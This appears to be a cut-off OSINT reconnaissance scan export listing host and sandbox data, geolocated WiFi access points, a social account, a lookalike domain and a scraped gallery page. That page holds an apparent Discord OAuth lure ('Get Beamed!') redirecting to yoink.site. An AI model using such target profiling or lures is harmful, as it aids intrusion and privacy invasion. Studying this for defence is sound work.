"hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", 
"vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}], "autonomous_system": {"bgp_prefix": "46.101.128.0/17", "country_code": "US", "asn": 14061, "name": "DIGITALOCEAN-ASN", "description": "DIGITALOCEAN-ASN"}} |
| 2023-05-12 03:01:24 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.233): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | \016\025\016\005\003\005\026\004\004\004\014\016\0 (Net ID: 00:0C:30:12:EC:AE) | 39.0469, -77.4903 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | FRATOAP001 (Net ID: 00:02:2D:53:7B:80) | 50.1188, 8.6843 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | taxoffice (Net ID: 00:06:25:4B:60:E0) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:98:DE:00) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | cross-origin-embedder-policy: require-corp | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=WwRFDMWv1i%2FLL8I%2BSQXrEl8P6VG5M1GGitMkpd4FkAGmtOdqQDCLc17nGzjDcmqZpet%2BvxBX8CUcOAv3alTgafYDwFhVZzoAKiiOmj1uFX8dLMhZ1ZA2lQdL%2FA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60363a5a178c-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:57:56 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://oathrocalc.netlify.app/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3124"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c34_IE_EarlyTabStart_0xb6c_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c34_ConnHashTable<3124>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c34_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c34_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_c34_IESQMMUTEX_0_331"\n "IsoScope_c34_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3124"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_c34_IE_EarlyTabStart_0xb6c_Mutex"'}, {u'category': u'General', u'origin': u'Network Traffic', 
u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.148.97.127:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "CEWY99B6.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CEWY99B6.txt]- [targetUID: 00000000-00002984]\n Dropped file: "J259UJ4T.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\J259UJ4T.txt]- [targetUID: 00000000-00003124]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "~DF7532A7032D3E3BFF.TMP" has type "data"- Location: [%TEMP%\\~DF7532A7032D3E3BFF.TMP]- [targetUID: 00000000-00003124]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00003124]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has 
type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "CEWY99B6.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CEWY99B6.txt]- [targetUID: 00000000-00002984]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003124]\n "B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565]- [targetUID: 00000000-00002984]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00002984]\n "_5237E03F-4890-11ED-B1DA-080027A81AD4_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF13AAB00B1FE20632.TMP" has type "data"- Location: [%TEMP%\\~DF13AAB00B1FE20632.TMP]- [targetUID: 00000000-00003124]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "~DF6F079E67AE4A1B66.TMP" has type "data"- Location: [%TEMP%\\~DF6F079E67AE4A1B66.TMP]- [targetUID: 00000000-00003124]\n "7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6]- [targetUID: 00000000-00002984]\n "_7B031BD4-4891-11ED-B1DA-080027A81AD4_.dat" has type "Composite Document File V2 Document Cannot read short stream"- 
[targetUID: N/A]\n "RecoveryStore._5237E03D-4890-11ED-B1DA-080027A81AD4_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://oathrocalc.netlify.app/"\n Pattern match: "https://oathrocalc.netlify.app"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/89 Antivirus vendors marked sample as malicious (0% detection rate)'}], u'threat_level': 0, u'size': None, u'job_id': u'63442076e8d44876b51cc291', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [u'34.148.97.127'], u'sha256': u'66a2fd4e0cf4a13e9ac67d89109c21daab9efc63458ad8218e353ddf47ff88e6', u'sha512': u'1245fe07cfb396b6773cc4d866ec988850a58e676320902da6be7733b5bdd7983344c3153f93fcefa4878d97545d293c487897b2f0e3f3d2b781792f279af4eb', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://oathrocalc.netlify.app/', u'submission_id': u'63442077e8d44876b51cc292', u'created_at': u'2022-10-10T13:39:03+00:00', u'filename': None}], u'analysis_start_time': u'2022-10-10T13:39:03+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 7, 
u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'c7ec97b5c563d59b5a6c9f7c76210246', u'network_mode': u'default', u'processes': [], u'sha1': u'dc379d517f72ad15cd77a2b37571b936c8acb2c3', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 7 64 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': []}] | 34.148.97.127 |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Twitter (Category: social): https://twitter.com/battleb0t | battleb0t |
| 2023-05-12 02:56:48 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 11, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://minehut.com/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"54.176.41.87:49733"\n "142.251.211.227:49737"\n "104.26.9.123:49738"\n "104.16.148.64:49739"\n "185.93.1.247:49740"\n "142.250.69.202:49741"\n "142.250.217.66:49743"\n "104.18.26.85:49744"\n "104.17.24.14:49746"\n "104.22.46.142:49747"\n "13.227.44.89:49748"\n "34.69.160.147:49752"\n "34.136.45.84:49753"\n "35.222.205.150:49754"\n "34.70.254.254:49755"\n "104.26.2.70:49756"\n "34.136.205.209:49758"\n "18.213.222.111:49759"\n "54.161.234.33:49765"\n "35.229.48.116:49771"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"63868ff535048f0009a9c77b--utils-lib.netlify.app"\n "ad-delivery.net"\n "api.minehut.com"\n "cdn.cookielaw.org"\n "cdnjs.cloudflare.com"\n "connect.facebook.net"\n "content.minehut.com"\n "core-lib.minehut.com"\n "media.graphcms.com"\n "pixel.tapad.com"\n "privacyportal-cdn.onetrust.com"\n "shell.minehut.com"\n "tr.snapchat.com"\n "utils-lib.minehut.com"\n "vue-legacy-ui.minehut.com"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': 
u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:4968:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:4968:120:WilError_01"\n "Local\\SM0:6184:304:WilStaging_02"\n "Local\\SM0:6184:120:WilError_01"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:4968:304:WilStaging_02"\n "Local\\ChromeProcessSingletonStartup!"\n "Local\\SM0:4968:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7632:304:WilStaging_02"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpsminehut.com" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00004968]\n "f_00024d" has type "gzip compressed data from Unix original size modulo 2^32 58592"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00024d]- [targetUID: 00000000-00007808]\n "f_000268" has type "RIFF (little-endian) data Web/P image"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_000268]- [targetUID: 00000000-00007808]\n "ebb17067-94f8-450c-9568-a82216ca290c.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\ebb17067-94f8-450c-9568-a82216ca290c.tmp]- [targetUID: 00000000-00007808]\n "b242f73b8f8d800d_0" has type 
"data"- [targetUID: N/A]\n "59dc75d7-2547-49eb-9184-aee5038c9697.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 227208"- Location: [%TEMP%\\59dc75d7-2547-49eb-9184-aee5038c9697.tmp]- [targetUID: 00000000-00004968]\n "01e58febefcac415_0" has type "data"- [targetUID: N/A]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00004968]\n "5e42a7bd8f7f5c6d_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\5e42a7bd8f7f5c6d_0]- [targetUID: 00000000-00004968]\n "739aec52abd1ef18_0" has type "data"- [targetUID: N/A]\n "f_00023e" has type "gzip compressed data max compression original size modulo 2^32 389379"- [targetUID: N/A]\n "dd645e9d-3232-4e52-bf26-866b8133ca70.tmp" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "195beb76-9db3-4752-8dc5-1c9fb22b370e.tmp" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "db2a7507399ba0fe_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\db2a7507399ba0fe_0]- [targetUID: 00000000-00004968]\n "c9bd6e5856a90fb8_0" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00004968]\n "b2c20a88-d803-4261-8816-190344952cfd.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\b2c20a88-d803-4261-8816-190344952cfd.tmp]- [targetUID: 00000000-00004968]\n "f_000243" has type "gzip compressed data from Unix original size modulo 2^32 165367"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_000243]- [targetUID: 
00000000-00007808]\n "23d3f5d3edbe4758_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\23d3f5d3edbe4758_0]- [targetUID: 00000000-00004968]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://minehut.com/"\n Pattern match: "https://minehut.com"\n Heuristic match: "ad-delivery.net"\n Heuristic match: "api.minehut.com"\n Heuristic match: "cdn.cookielaw.org"\n Heuristic match: "cdnjs.cloudflare.com"\n Heuristic match: "connect.facebook.net"\n Heuristic match: "content.minehut.com"\n Heuristic match: "core-lib.minehut.com"\n Heuristic match: "media.graphcms.com"\n Heuristic match: "pixel.tapad.com"\n Heuristic match: "privacyportal-cdn.onetrust.com"\n Heuristic match: "shell.minehut.com"\n Heuristic match: "tr.snapchat.com"\n Heuristic match: "utils-lib.minehut.com"\n Heuristic match: "vue-legacy-ui.minehut.com"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com" seems to be random'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/90 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': 
u'network-7', u'name': u'Uses network protocols on unusual ports', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1571', u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': u'T1571', u'relevance': 7, u'threat_level': 2, u'type': 7, u'description': u'TCP traffic to 54.176.41.87 on port 49733\n TCP traffic to 142.251.211.227 on port 49737\n TCP traffic to 104.26.9.123 on port 49738\n TCP traffic to 104.16.148.64 on port 49739\n TCP traffic to 185.93.1.247 on port 49740\n TCP traffic to 142.250.69.202 on port 49741\n TCP traffic to 142.250.217.66 on port 49743\n TCP traffic to 104.18.26.85 on port 49744\n TCP traffic to 104.17.24.14 on port 49746\n TCP traffic to 104.22.46.142 on port 49747\n TCP traffic to 13.227.44.89 on port 49748\n TCP traffic to 34.69.160.147 on port 49752\n TCP traffic to 34.136.45.84 on port 49753\n TCP traffic to 35.222.205.150 on port 49754\n TCP traffic to 34.70.254.254 on port 49755\n TCP traffic to 104.26.2.70 on port 49756\n TCP traffic to 34.136.205.209 on port 49758\n TCP traffic to 18.213.222.111 on port 49759\n TCP traffic to 54.161.234.33 on port 49765\n TCP traffic to 35.229.48.116 on port 49771\n TCP traffic to 142.250.217.72 on port 49772\n TCP traffic to 157.240.254.7 on port 49776\n TCP traffic to 54.230.58.252 on port 49778\n TCP traffic to 104.18.35.85 on port 49779\n TCP traffic to 35.190.43.134 on port 49780\n TCP traffic to 104.26.14.167 on port 49781\n TCP traffic to 172.67.75.33 on port 49782\n TCP traffic to 74.125.195.155 on port 49787\n TCP traffic to 157.240.22.35 on port 49788\n TCP traffic to 107.178.246.49 on port 49791\n TCP traffic to 35.203.130.56 on port 49796'}], u'threat_level': 2, u'size': None, u'job_id': u'63b1da6cb79fb1747e53944f', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', 
u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_ide | 35.229.48.116 |
| 2023-05-12 03:18:06 | Externally Hosted Javascript | No | Page Information | 0 | 0 | 3 | 0 | None | https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | abay (Net ID: 00:08:5C:FB:81:BF) | 40.2024, 29.0398 |
| 2023-05-12 03:16:17 | Similar Domain | Yes | Tool - DNSTwist | 1 | 0 | 1 | 0 | None | ayshu.xyz | ayhu.xyz |
